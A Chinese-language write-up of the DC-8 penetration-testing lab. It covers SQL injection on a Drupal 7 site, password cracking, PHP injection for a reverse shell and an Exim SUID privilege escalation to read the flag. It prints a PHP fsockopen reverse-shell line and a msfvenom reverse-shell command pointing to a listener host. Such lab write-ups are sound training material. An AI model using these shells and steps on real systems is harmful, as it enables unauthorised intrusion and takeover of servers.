DC8
经验 & 总结
- 对页面的功能和对应的url要敏感。
- 所有的功能都要测试,要雨露均沾。
- 提示说的那个双因子认证……我真没找到,tweet翻了好久也没找到。
- 爆破虽然很无脑,但是在后台慢慢跑,万一有收获呢(当然真实环境还是需要看字典的)。
- 插入PHP代码那个地方为什么要在开头输入字符串的问题还没理清楚。
步骤流水
信息搜集
-
下载页面的提示信息:
- 涉及到双因子认证,POC由推特用户@theart42 提出
- 任务目标:绕过双因子认证、获得root权限、读取flag
- 双因子认证交互接口在SSH上
-
端口扫描,发现只开放了80和22端口,80端口透露出的信息判断CMS为Drupal7.
-
访问80端口页面
80端口
-
一顿瞎点之后发现页面上方的导航栏和左侧的导航栏指向地址不同,而且存在sql注入。
-
sqlmap一把梭,因为mysql端口并没有暴露在外边,数据库中只有drupal的内容,因此将方向确定为获取drupal的用户口令。
-
整理之后得到用户名和对应hash内容,利用john爆破得到john用户密码 (这个用户名应该算是提示吧)
- 测试登录ssh和drupal,无法登录ssh但是可以登录drupal。
- 测试登录ssh和drupal,无法登录ssh但是可以登录drupal。
-
和之前的DC7不一样,这个用户的权限比较低,只能修改页面内容,对每个功能进行尝试的时候发现一个可以插入php代码的地方。
-
但是测试并没有效果,返回的是修改之前默认的内容,一顿瞎试也没解决,网上也没找到相关信息(可能是姿势不对)
-
最后参照网上其他的walkthrough,发现需要在php代码之前添加其他字符
-
-
获得服务器相关信息,但是尝试通过sqlmap向web目录下写文件失败,尝试使用php代码直接构造webshell,因为看起来代码执行的结果是直接包含在drupal页面中的,因此考虑使用回连式shell。
获取Shell
-
添加回连代码
- 第一个版本,可以执行,但是连接回来就掉了,不清楚原因(如果有知道原因的兄弟,还请告知~)
<?php $sock=fsockopen("公网IP",端口); exec("/bin/sh -i <&3 >&3 2>&3"); ?>
-
使用msf生成回连shell,这个代码在执行的时候页面是一直处在加载状态的
msfvenom -p php/reverse_php LHOST=10.0.2.15 LPORT=8888 -f raw -o reshell.php
-
鸟枪换炮
提权
-
使用
LinEnum.sh
查看相关信息-
内核信息:
Linux dc-8 4.9.0-4-amd64 #1 SMP Debian 4.9.51-1 (2017-09-28) x86_64 GNU/Linux
-
全局可写文件也没有什么特殊的
-
在当前进程中看到了一个不同寻常的程序:exim4具有SUID
-
-
exim4
exim4:
Exim4是在剑桥大学开发的另一种消息传输代理(MTA),用于在连接到Internet的Unix系统上使用。 尽管exim的配置与sendmail的配置完全不同,但是可以安装Exim代替sendmail。
-
确认版本
-
相关漏洞
-
由于我的msf框架比较老,没收录这个,同时又不想放弃已经搞下来的shell,因此选择尝试
Exim 4.87 - 4.91 - Local Privilege Escalation
-
-
尝试提权脚本
-
检查了一下,是Windows换行符的问题,使用vim打开文件后
:set ff=unix
保存即可 -
第一次执行失败,尝试代码中提示的第二种方法,成功提权。
-
成功读取flag.txt